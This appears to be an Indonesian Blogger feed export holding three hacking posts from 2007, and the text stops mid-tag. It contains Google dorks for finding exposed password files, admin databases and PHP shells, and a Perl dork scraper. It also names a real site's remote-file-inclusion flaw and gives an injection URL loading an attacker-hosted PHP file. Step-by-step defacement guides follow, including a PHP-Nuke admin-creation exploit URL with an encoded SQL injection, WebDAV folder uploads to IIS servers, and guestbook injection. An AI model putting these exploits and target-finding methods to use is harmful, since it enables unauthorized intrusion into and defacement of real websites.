intitle:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari judul halaman "Admin" dengan&lt;br /&gt;deskripsi "Administrasi"&lt;br /&gt;&lt;br /&gt;- allintitle: Untuk mencari kata-kata dari judul halaman web&lt;br /&gt;secara lengkap.&lt;br /&gt;Keyword: allintitle:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari judul halaman yang mengandung&lt;br /&gt;kata "Admin" dan "Administrasi"&lt;br /&gt;&lt;br /&gt;- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata&lt;br /&gt;tertentu.&lt;br /&gt;Keyword: inurl:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari URL yang mengandung kata "Admin"&lt;br /&gt;dengan deskripsi "Administrasi"&lt;br /&gt;&lt;br /&gt;- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata&lt;br /&gt;tertentu.&lt;br /&gt;Keyword: allinurl:Admin Administrasi&lt;br /&gt;Keyword tersebut akan mencari URL yang mengandung kata "Admin"&lt;br /&gt;dan "Administrasi"&lt;br /&gt;&lt;br /&gt;- site: Untuk mencari dalam suatu situs tertentu saja&lt;br /&gt;Keyword: site:echo.or.id&lt;br /&gt;Semua pencarian hanya berdasarkan site "echo.or.id"&lt;br /&gt;&lt;br /&gt;- cache: Ketika Googlebot mengindeks suatu situs, google akan&lt;br /&gt;mengambil snapshot dari semua halaman yang telah terindeks.&lt;br /&gt;Operator ini membantu melihat halaman-halaman yang telah&lt;br /&gt;dicache.&lt;br /&gt;Keyword: cache:echo.or.id&lt;br /&gt;Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya&lt;br /&gt;pada snapshot/cache yang disimpan oleh Google.&lt;br /&gt;&lt;br /&gt;- define: Operator ini digunakan untuk mencari definisi dari frasa&lt;br /&gt;tertentu. Semua kata yang diketik setelah operator ini akan&lt;br /&gt;diperlakukan sebagai satu frasa.&lt;br /&gt;Keyword: define:hacker&lt;br /&gt;&lt;br /&gt;- filetype: Jika kita mencari jenis file tertentu yang berisi informasi&lt;br /&gt;yang anda inginkan kita bisa menggunakan operator ini.&lt;br /&gt;Keyword: "hacker" filetype:pdf&lt;br /&gt;Sampai tulisan ini dibuat google support tipe file&lt;br /&gt;# Adobe Portable Document Format (pdf)&lt;br /&gt;# Adobe PostScript (ps)&lt;br /&gt;# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)&lt;br /&gt;# Lotus WordPro (lwp)&lt;br /&gt;# MacWrite (mw)&lt;br /&gt;# Microsoft Excel (xls)&lt;br /&gt;# Microsoft PowerPoint (ppt)&lt;br /&gt;# Microsoft Word (doc)&lt;br /&gt;# Microsoft Works (wks, wps, wdb)&lt;br /&gt;# Microsoft Write (wri)&lt;br /&gt;# Rich Text Format (rtf)&lt;br /&gt;# Shockwave Flash (swf)&lt;br /&gt;# Text (ans, txt)&lt;br /&gt;Ref: http://www.google.com/help/faq_filetypes.html&lt;br /&gt;&lt;br /&gt;- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa&lt;br /&gt;menggunakan operator link.&lt;br /&gt;Keyword: link:www.google.com&lt;br /&gt;&lt;br /&gt;- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.&lt;br /&gt;Keyword: related:www.google.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 03 // Manipulasi URL Google ------------------------------------------&lt;br /&gt;&lt;br /&gt;&gt; And bisa mengganti interface google dengan mengganti variabel hl&lt;br /&gt;(default google hl=en =&gt; bahasa inggris)&lt;br /&gt;Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?hl=id&amp;lr=&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;&lt;br /&gt;&gt; Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini&lt;br /&gt;dilakukan dengan modifikasi variabel lr.&lt;br /&gt;(default google lr=lang_en =&gt; bahasa inggris)&lt;br /&gt;Misalkan kita hasil pencarian hanya bahasa Indonesia.&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=lang_id&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;&lt;br /&gt;&gt; Secara default google akan menampilkan 10 site perhalaman. Anda dapat&lt;br /&gt;mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel&lt;br /&gt;num pada URL :D&lt;br /&gt;Penggunaan num antara 1-100&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?num=100&amp;hl=en&amp;lr=&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;&lt;br /&gt;&gt; as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini&lt;br /&gt;digunakan menentukan hasil berdasarkan bulan. x antara 1-12&lt;br /&gt;Ex:&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;Hasil modifikasi URL&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=&amp;as_qdr=m1&amp;q=site%3Aecho.or.id&amp;btnG=Search&lt;br /&gt;&lt;br /&gt;&gt; safe=off: arti dari variabel ini filter "SafeSearch" dimatikan. "SafeSearch"&lt;br /&gt;untuk memfilter hasil pencarian sexual.&lt;br /&gt;&lt;br /&gt;Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer&lt;br /&gt;sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih&lt;br /&gt;dahulu (kecuali anda menggunakan brwoser yang support google secara built-in&lt;br /&gt;atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat&lt;br /&gt;bandwidth ke luar negeri :D&lt;br /&gt;Karena bandwidth di Indonesia mahal ........&lt;br /&gt;&lt;br /&gt;Contoh script google.html lengkap dengan varabielnya.&lt;br /&gt;&lt;br /&gt;--- BOF google.html ---&lt;br /&gt;&lt;br /&gt;&lt;form action="http://www.google.com/search" name=f&gt;&lt;br /&gt;Variabel num: &lt;input name=num value=10&gt;&lt;br&gt;&lt;br /&gt;Variabel hl: &lt;input name=hl value=en&gt;&lt;br&gt;&lt;br /&gt;Variabel lr: &lt;input name=lr value=lang_id&gt;&lt;br&gt;&lt;br /&gt;Variabel as_qdr: &lt;input name=as_qdr value=m12&gt;&lt;br&gt;&lt;br /&gt;Variabel safe: &lt;input name=safe value=off&gt;&lt;br&gt;&lt;br /&gt;&lt;input maxLength=256 size=55 name=q value=""&gt;&lt;br&gt;&lt;br /&gt;&lt;input type=submit value="Google Search" name=btnG&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;--- EOF google.html ---&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau&lt;br /&gt;menambahkan apapun disana. Semuanya terserah kepada anda :D&lt;br /&gt;Berikut merupakan script default pencarian google.&lt;br /&gt;&lt;br /&gt;--- BOF google.html ---&lt;br /&gt;&lt;br /&gt;&lt;form action="http://www.google.com/search" name=f&gt;&lt;br /&gt;&lt;input maxLength=256 size=55 name=q value=""&gt;&lt;br&gt;&lt;br /&gt;&lt;input type=submit value="Google Search" name=btnG&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;--- EOF google.html ---&lt;br /&gt;&lt;br /&gt;Google masih terus dikembangkan. Untuk melihat apa yang sedang&lt;br /&gt;dikembangkan Google. Anda bisa ke http://labs.google.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 04 // Tips &amp; Tricks --------------------------------------------------&lt;br /&gt;&lt;br /&gt;Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan&lt;br /&gt;operator-operator tersebut.&lt;br /&gt;&lt;br /&gt;Ex:&lt;br /&gt;- Keyword: site:echo.or.id, menghasilkan semua site echo.or.id. Kemudian&lt;br /&gt;anda bisa mencoba keyword: site:echo.or.id hacker, akan menghasilkan&lt;br /&gt;semua site echo.or.id yang mengandung kata hacker.&lt;br /&gt;&lt;br /&gt;Kita juga dapat melakukan pencarian secara spesifik melalui google.&lt;br /&gt;Untuk melakukannya anda dapat ke site berikut:&lt;br /&gt;- http://www.google.com/bsd&lt;br /&gt;- http://www.google.com/mac&lt;br /&gt;- http://www.google.com/linux&lt;br /&gt;- http://www.google.com/microsoft&lt;br /&gt;- http://www.google.com/univ/education&lt;br /&gt;&lt;br /&gt;Berbagai trik keyword pada Google:&lt;br /&gt;parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums&lt;br /&gt;&lt;br /&gt;intitle:index of intitle:mp3 -html -htm name size&lt;br /&gt;intitle:index of intitle:video -html -htm name size&lt;br /&gt;intitle:index of intitle:cgi-bin passwd -html -htm name size&lt;br /&gt;intitle:index of intitle:cgi-bin password -html -htm name size&lt;br /&gt;&lt;br /&gt;inurl:"admin.mdb" -html&lt;br /&gt;inurl:"password.mdb" -html&lt;br /&gt;inurl:"data.mdb" -html&lt;br /&gt;"phpMyAdmin" "running on" inurl:"main.php"&lt;br /&gt;intitle:"PHP Shell" "Enable stderr" php&lt;br /&gt;&lt;br /&gt;Masih banyak lagi keyword yang bisa ditemukan disini [5] :D&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--- 05 // Referensi ------------------------------------------------------&lt;br /&gt;&lt;br /&gt;[1] http://www.google.com/help/basics.html&lt;br /&gt;[2] http://www.google.com/help/features.html&lt;br /&gt;[3] http://www.google.com/help/refinesearch.html&lt;br /&gt;[4] http://www.google.com/help/interpret.html&lt;br /&gt;[5] http://johnny.ihackstuff.com/&lt;br /&gt;[6] O'Reilly - Google Hacks&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-4818679612054010745?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/4818679612054010745'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/4818679612054010745'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/google-hacking.html' title='Google Hacking'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-485383785695250627</id><published>2007-09-16T10:55:00.000+07:00</published><updated>2007-09-16T10:58:19.882+07:00</updated><title type='text'>Tool Pencari Google via Perl</title><content type='html'>maaf kalo sekiranya sudah basi, lagi buka &lt;a href="http://forum.milw0rm.com/viewtopic.php?t=2114&amp;amp;start=0&amp;amp;postdays=0&amp;amp;postorder=asc&amp;amp;highlight=" target="_blank"&gt;http://forum.milw0rm.com/viewtopic.php?t=2114&amp;amp;start=0&amp;amp;postdays=0&amp;amp;postorder=asc&amp;amp;highlight=&lt;/a&gt;&lt;br /&gt;ternyata ada tool dengan bahasa perl untuk pencarian(dork) google tanpa harus dengan webbrowser cukup dengan tool ini maka setiap hasil pencarian akan disimpan di sebuat file .txt&lt;br /&gt;cara penggunaan nya yaitu pertama kita buat file yan berisikan dork, contoh&lt;br /&gt;c:\&gt;echo allinurl:com_serverstat &gt; mambo.txt&lt;br /&gt;c:\&gt; perl mesin_google.pl mambo.txt&lt;br /&gt;kemudian di tanya apakah ingin menambah dork lagi +, jika cukup itu aja tekan enter&lt;br /&gt;proses berjalan kemudian hasil pencarian akan di simpan berupa hasil_pencarian_google.txt&lt;br /&gt;Original Script &lt;a href="http://www.thorking.kit.net/exploit/un-googler.txt" target="_blank"&gt;http://www.thorking.kit.net/exploit/un-googler.txt&lt;/a&gt;&lt;br /&gt;Modified Script &lt;a href="http://k1tk4t.gigcities.com/perl/mesin_google.txt" target="_blank"&gt;http://k1tk4t.gigcities.com/perl/mesin_google.txt&lt;/a&gt;&lt;br /&gt;&lt;center&gt;&lt;table class="code-table" align="center" cellpadding="0" cellspacing="0" width="90%"&gt; &lt;tbody&gt;&lt;tr&gt;  &lt;td class="code-corner" height="19" width="19"&gt;&lt;img src="http://echo.or.id/forum/templates/AcidTechBlood/images/code_header.gif" alt="" height="19" width="19" /&gt;&lt;/td&gt;  &lt;td class="code-header" align="left" width="100%"&gt;Code:&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt;  &lt;td class="code-left"&gt;&lt;img src="http://echo.or.id/forum/templates/AcidTechBlood/images/spacer.gif" alt="" height="40" width="19" /&gt;&lt;/td&gt;  &lt;td class="code-text"&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;&lt;br /&gt;#Un-Gogler baseado no "Googler by N3ur0t1c&lt;br /&gt;&lt;br /&gt;use IO::Socket::INET;&lt;br /&gt;&lt;br /&gt;print " [*]-----------------------------[*]";&lt;br /&gt;print "\n [*]   Got2Think Hacking Team    [*]";&lt;br /&gt;print "\n [*]      Un-Googler Filter      [*] \n";&lt;br /&gt;print " [*]     Coded by Shaman286      [*]\n";&lt;br /&gt;print " [*]     Modified by k1tk4t      [*]\n";&lt;br /&gt;print " [*]      &lt;a href="http://www.google.co.id%c2%a0/" target="_blank"&gt;www.google.co.id &lt;/a&gt;      [*]\n";&lt;br /&gt;print " [*]-----------------------------[*]\n\n";&lt;br /&gt;&lt;br /&gt;if(!$ARGV[0])&lt;br /&gt;{&lt;br /&gt;  print "Gunakan:perl $0 &lt;dork_list.txt&gt;";&lt;br /&gt;  exit;&lt;br /&gt;}&lt;br /&gt;chomp ($ARGV[0]);&lt;br /&gt;open (sites, $ARGV[0]) or die "salah!! dork_list.txt tidak ditemukan atau belum terisi";&lt;br /&gt;@sites = &lt;sites&gt;;&lt;br /&gt;close(sites) ;&lt;br /&gt;print "\n Penambahan kata kunci(dork) untuk pencarian\n\n";&lt;br /&gt;$dork2 = &lt;stdin&gt;;&lt;br /&gt;chomp($dork2);&lt;br /&gt;foreach $dork1(@sites)&lt;br /&gt;{&lt;br /&gt;chomp($dork1);&lt;br /&gt;$a=0;&lt;br /&gt;print "\n\npencarian dengan $dork1 + $dork2\n\n";&lt;br /&gt;$resul2="";&lt;br /&gt;while($resul2 !~ /resultados omitidos/)&lt;br /&gt;&lt;br /&gt;{&lt;br /&gt;   if($a&lt;10)&lt;br /&gt;   {&lt;br /&gt;   PEGA1:&lt;br /&gt;    sleep 1;&lt;br /&gt;    $sock = IO::Socket::INET-&gt;new(PeerAddr =&gt; "www.google.co.id", PeerPort =&gt; 80, Proto =&gt; "tcp")or next;&lt;br /&gt;    print $sock "GET /search?q=$dork1+$dork2&amp;amp;hl=pt-BR&amp;amp;lr=&amp;amp;start=$a&amp;amp;sa=N HTTP/1.0\r\n";&lt;br /&gt;    print $sock "Content-type: text/html\n\n";&lt;br /&gt;    print $sock "Host: &lt;a href="http://www.google.co.id/" target="_blank"&gt;www.google.co.id&lt;/a&gt;\r\n\r\n";&lt;br /&gt;    @resul=&lt;$sock&gt;;&lt;br /&gt;    $resul2="@resul";&lt;br /&gt;    close($sock);&lt;br /&gt;    sleep 1;&lt;br /&gt;   }&lt;br /&gt;&lt;br /&gt;   else&lt;br /&gt;   {&lt;br /&gt;&lt;br /&gt;    PEGA2:&lt;br /&gt;    sleep 1;&lt;br /&gt;    $sock = IO::Socket::INET-&gt;new(PeerAddr =&gt; "www.google.co.id", PeerPort =&gt; 80, Proto =&gt; "tcp")or next;&lt;br /&gt;    print $sock "GET /search?q=$dork1+$dork2&amp;amp;hl=pt-BR&amp;amp;lr=&amp;amp;start=$a&amp;amp;sa=N HTTP/1.0\r\n";&lt;br /&gt;    print $sock "Content-type: text/html\n\n";&lt;br /&gt;    print $sock "Host: &lt;a href="http://www.google.co.id/" target="_blank"&gt;www.google.co.id&lt;/a&gt;\r\n\r\n";&lt;br /&gt;    @resul=&lt;$sock&gt;;&lt;br /&gt;    $resul2="@resul";&lt;br /&gt;    close($sock);&lt;br /&gt;    sleep 1;&lt;br /&gt;   }&lt;br /&gt;&lt;br /&gt;   FILTER:&lt;br /&gt;   while($resul2=~ m/&lt;a class="l" href=".*?"&gt;.*?&lt;\/a&gt;/)&lt;br /&gt;  {&lt;br /&gt;   $resul2=~ s/&lt;a class="l" href="(.*?)"&gt;.*?&lt;\/a&gt;/$1/;&lt;br /&gt;   $ref = $1;&lt;br /&gt;   $prox = $ref;&lt;br /&gt;   substr($prox, 0, 7) ="";&lt;br /&gt;   #$ref = index $prox, '/';&lt;br /&gt;   #$prox = substr($prox,0,$ref);&lt;br /&gt;   print "$prox\n";&lt;br /&gt;   open(arq,"&gt;&gt;hasil_pencarian_google.txt");&lt;br /&gt;   print arq "$prox\n";&lt;br /&gt;   close(arq);&lt;br /&gt;&lt;br /&gt;  }&lt;br /&gt;$a +=10;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;print "[+] Olhe a lista hasil_pencarian_google.txt\n"&lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;&lt;/center&gt; &lt;br /&gt;&lt;br /&gt;hasil dari &lt;br /&gt;c:\&gt;echo allinurl:com_serverstat &gt; mambo.txt&lt;br /&gt;c:\&gt; perl mesin_google.pl mambo.txt&lt;br /&gt;hasil pencarian bisa di lihat &lt;a href="http://k1tk4t.gigcities.com/daftar/hasil_pencarian_google.txt" target="_blank"&gt;http://k1tk4t.gigcities.com/daftar/hasil_pencarian_google.txt&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;dari coba dengan dork &lt;span style="font-style: italic;"&gt;index.php?&lt;/span&gt; dan dork tambahan &lt;span style="font-style: italic;"&gt;page= &lt;/span&gt; saya mendapatkan beberapa site yang masih memiliki bug RFI yaitu &lt;br /&gt;&lt;a href="http://www.muffindomain.com/index.php?page=links.html" target="_blank"&gt;http://www.muffindomain.com/index.php?page=links.html&lt;/a&gt; INJECTION WITH &lt;a href="http://www.muffindomain.com/index.php?page=http://k1tk4t.gigcities.com/php2l.txt?" target="_blank"&gt;http://www.muffindomain.com/index.php?page=http://k1tk4t.gigcities.com/php2l.txt?&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-485383785695250627?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/485383785695250627'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/485383785695250627'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/tool-pencari-google-via-perl.html' title='Tool Pencari Google via Perl'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-8234544089896840710</id><published>2007-09-16T08:36:00.000+07:00</published><updated>2007-09-16T08:39:18.728+07:00</updated><title type='text'>Langkah-Langkah Deface</title><content type='html'>&lt;div class="post_content"&gt;&lt;p&gt;&lt;strong&gt;Deface situs php nuke&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Buka situs www.google.com&lt;br /&gt;kemudian ketik =&gt;&lt;br /&gt;allinurl:.com/nuke/index.php atau&lt;br /&gt;allinurl:.org/nuke/index.php.&lt;br /&gt;Nah ….. kalo  udah ketemu targetnya maka langkah&lt;br /&gt;selanjutnya adalah :&lt;br /&gt;1. www.target.com/nuke/index.php&lt;br /&gt;2. www.target.com/nuke/admin.php =&gt;&lt;br /&gt;index.php yg diatas tadi dirubah&lt;br /&gt;menjadi admin.php&lt;br /&gt;3. Masukkan bug ini di belakang situs tadi :&lt;/p&gt; &lt;p&gt;?op=AddAuthor&amp;amp;add_aid=budakbaonk&amp;amp;add_name=&lt;br /&gt;God&amp;amp;add_pwd=bajingan&amp;amp;add_email=&lt;br /&gt;sandal_karet@yahoo.com&amp;amp;add_radminsuper=1&amp;amp;admin=&lt;br /&gt;eCcgVU5JT04gU0VMRUNUIDEvKjox&lt;/p&gt; &lt;p&gt;misal : www.target.com/nuke/admin.php?&lt;br /&gt;op=AddAuthor&amp;amp;add_aid=budakbaonk&amp;amp;add_name=&lt;br /&gt;God&amp;amp;add_pwd=bajingan&amp;amp;add_email=&lt;br /&gt;sandal_karet@yahoo.com&amp;amp;add_radminsuper=1&amp;amp;admin=&lt;br /&gt;eCcgVU5JT04gU0VMRUNUIDEvKjox&lt;/p&gt; &lt;p&gt;Kalo nggak mau berarti situs tsb udah di path ama admin nya.&lt;br /&gt;Tapi kalo berhasil, maka di url/browsing lu muncul&lt;br /&gt;www.target.com/nuke/admin.php?op=mod_author&lt;/p&gt; &lt;p&gt;5. Disana lu di suruh login, masukin id &amp;amp; password lu tadi.&lt;br /&gt;Masih ingat kan ?&lt;br /&gt;id=budakbaonk            =&gt; liat yg diatas tadi&lt;br /&gt;password=bajingan        =&gt; liat yg diatas tadi&lt;/p&gt; &lt;p&gt;Nah lu skrg udah masuk ke “Administration Menu” situs tsb.&lt;br /&gt;Berarti lu udah mengusai situs tsb skrg ! He he he he he&lt;br /&gt;Skrg lu pilih gambar Handphone (dibawahnya ada tulisan Messages),&lt;br /&gt;Kolom title =&gt;&lt;br /&gt;&lt;img src="http://geocities.com/psychophysiological1981/scripts/1.bmp" /&gt;&lt;br /&gt;Kolom content =&gt;&lt;br /&gt;&lt;img src="http://geocities.com/psychophysiological1981/scripts/2.bmp" /&gt;&lt;br /&gt;Kolom expiration =&gt; unlimited&lt;br /&gt;trus klik tab add messages yg ada dibawah&lt;br /&gt;Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi,&lt;br /&gt;misal www.target.com/nuke atau www.target.com/nuke/index.php&lt;br /&gt;kalo nggak ada hasil deface lu coba klik tab refresh yg ada&lt;br /&gt;diatas yg disamping url/browsing lu&lt;/p&gt; &lt;p&gt;========================================&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Deface asp/iis dgn menggunakan win 98&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;1. Klik Icon “My Computer” di komputer kamu.&lt;br /&gt;2. Cari Icon “Web Folder” didalam My Computer Itu.&lt;br /&gt;3. Klick lagi Icon “Add web folder” dan akan muncul&lt;br /&gt;“Type the location to add”.&lt;br /&gt;4. Ketiklah nama situs yang akan kita deface/tambahkan filenya&lt;br /&gt;misalnya   http://www.52down.com. Kemudian klik Next.&lt;br /&gt;5. Muncul “Enter the name for this Web Folder”, kemudian klik Finish.&lt;br /&gt;kalau tidak ada “Finish” nya atau “Error” artinya tidak bisa dideface&lt;br /&gt;jadi kamu musti cari target lain.&lt;br /&gt;6. Apabila sudah berhasil, kembali lagi ke Web Folder, disana kita lihat&lt;br /&gt;ada file http://www.52down.com. Klik file situs tsb.&lt;br /&gt;7. Buka file “Hacked.html” kamu tadi (kalo belum ada file html,&lt;br /&gt;lu buat dulu file html di ms.fronpage trus simpan di kompi lu)&lt;br /&gt;terus copy kemudian kembali lagi ke file http://www.52down.com,&lt;br /&gt;paste kan file “Test.html” tadi. Kalau tidak bisa di paste kan artinya&lt;br /&gt;udah dipath sama adminnya, jadi kamu musti cari target lain.&lt;br /&gt;8. Apabila sudah berhasil, kita lihat hasilnya di url/browsing&lt;br /&gt;misalnya  http://www.52down.com/Test.html&lt;br /&gt;9. Kalau mau mencari target caranya cari di www.google.com terus&lt;br /&gt;ketik allinurl:.com/index.asp atau allinurl:.org/default.asp&lt;br /&gt;tinggal kreatifitas kamu mencari target.&lt;br /&gt;Atau bisa cari target di http://www.zone-h.org/en/defacements/&lt;br /&gt;klik mirror yg sebelah kanan (yg windows 2000),&lt;br /&gt;Perhatikan target nya =&gt; Defacer: Infektion Group&lt;br /&gt;Domain : www.namatarget.com  &lt;&lt;&gt; &lt;p&gt;=======================================&lt;/p&gt; &lt;p&gt;&lt;strong&gt;cara membuat html :&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Buka ms.frontpage, klik tab format diatas, trus pilih backgrounds,&lt;br /&gt;trus pilih enable hyperlink, trus pilih color background,&lt;br /&gt;pilih warna hitam, trus ok&lt;br /&gt;Trus pilih tab center yg diatas (rata tengah) kayak ms.word,&lt;br /&gt;ukuran huruf pilih no.5 (18pt), trus pilih font color (yg gambar A),&lt;br /&gt;pilih warna merah, kalo udah tulis Hacked by nama nick kamu,&lt;br /&gt;tekan enter 3 kali Trus ketik&lt;br /&gt;Hey Admin……..do you a need help ? trus enter sekali,&lt;br /&gt;trus tulis Matrix.Dal.Net - #surabayahack, trus enter 3 kali&lt;br /&gt;Kalo kalo mau pake gambar pilih tab insert diatas, trus pilih pictures,&lt;br /&gt;trus pilih from file…., di file name ketik&lt;br /&gt;http://www.finagro.gov.co/902.gif atau cari file jpg/gif di pc lu&lt;br /&gt;trus ok Kalo mau pake musik pilih tab format diatas,&lt;br /&gt;trus pilih backgrounds trus pilih tab general,&lt;br /&gt;pada “background sound location” ketik&lt;br /&gt;http://www.indonesia.go.id/berkibar.mid atau cari file midi di pc lu&lt;br /&gt;trus ok Utk nyimpan nya pilih tab file diatas, pilih save as…&lt;br /&gt;file name : Hacked atau nama nick kamu, trus ok&lt;br /&gt;Catatan : seandainya waktu lu nyimpan file ada keluar&lt;br /&gt;“save embedded file” pilih “set action” trus pilih “dont save” trus ok&lt;br /&gt;Utk meliat hasilnya pilih tab preview dibagian bawah.&lt;/p&gt; &lt;p&gt;=======================================&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Deface guestbook (buku tamu)&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Dengan menggunakan teknik SQL Injection,kita bisa mendeface guestbook&lt;br /&gt;(bukutamu) baik file php,asp,cfm,cgi,html dan kawan2. Ingat2 nggak&lt;br /&gt;semua guestbook  bisa dideface.&lt;br /&gt;Langkah2 nya&lt;/p&gt; &lt;p&gt;I. Cari target guestbook di www.google.co.id dgn mengetikkan&lt;br /&gt;site:my guestbook.php atau site:com bukutamu.php&lt;/p&gt; &lt;p&gt;II. Kalo udah dapat target nya, misalnya www.namatarget.my/guestbook.php&lt;br /&gt;maka yg perlu lu lakukan adalah mengisi kolom2 guestbook yg tersedia.&lt;br /&gt;Lu nggak perlu mengisi kolom guestbook nya dgn identitas asli,&lt;br /&gt;cukup identitas palsu aja.&lt;/p&gt; &lt;p&gt;contoh :&lt;/p&gt; &lt;p&gt;Nama     : boneka lucu&lt;br /&gt;Email    : boneka_2005@yahoo.com&lt;br /&gt;Website  : www.boneka-lucu.com&lt;br /&gt;Asal     : toko boneka&lt;br /&gt;Komentar :&lt;br /&gt;&lt;img src="http://geocities.com/psychophysiological1981/scripts/3.bmp" /&gt;&lt;/p&gt; &lt;p&gt;Perhatikan baik2 perintah yg ada di kolom komentar,dgn cara&lt;br /&gt;SQL Injection ke guestbook tsb, disitu kita akan memasukkan&lt;br /&gt;sebuah gambar (jgn gambar porno ya ? nggak boleh lho ?&lt;br /&gt;ntar dimarah mama). Trus klik tombol “submit” atau tombol apa&lt;br /&gt;namanya yg ada di guestbook tsb. Selanjutnya buka url/browsing baru trus&lt;br /&gt;ketik target tadi www.namatarget.my/guestbook.php&lt;br /&gt;Kalo hasilnya belum ada, coba klik tab “refresh” di samping url/browsing&lt;br /&gt;lu. Nah…muncul deh gambar yg kita masukin tadi di guestbook tsb.&lt;br /&gt;Berarti guestbook tsb bisa dideface.&lt;/p&gt; &lt;p&gt;Catatan :&lt;br /&gt;Kalo nggak ada gambarnya, yg ada hanya tulisan&lt;br /&gt;&lt;img src="http://geocities.com/psychophysiological1981/scripts/3.bmp" /&gt;&lt;br /&gt;berarti guestbook tsb nggak bisa dideface. Lu jgn kecewa dong !&lt;br /&gt;cari target yg lain.&lt;/p&gt; &lt;p&gt;III. Kalo udah muncul gambar yg kita masukkan tadi,&lt;br /&gt;buka lagi guesbook tsb. Trus isi lagi kolom2 guestbook yg tersedia.&lt;/p&gt; &lt;p&gt;contoh :&lt;/p&gt; &lt;p&gt;Nama     : deface&lt;br /&gt;Email    : deface_2005@yahoo.com&lt;br /&gt;Website  : www.deface.com&lt;br /&gt;Asal     : dunia maya&lt;br /&gt;komentar :&lt;/p&gt; &lt;p&gt;&lt;span style="font-family:Courier New;"&gt;&lt;img src="http://geocities.com/psychophysiological1981/scripts/1.bmp" /&gt;&lt;br /&gt;Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke guestbook tsb, disitu kita akan memasukkan script utk deface.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span 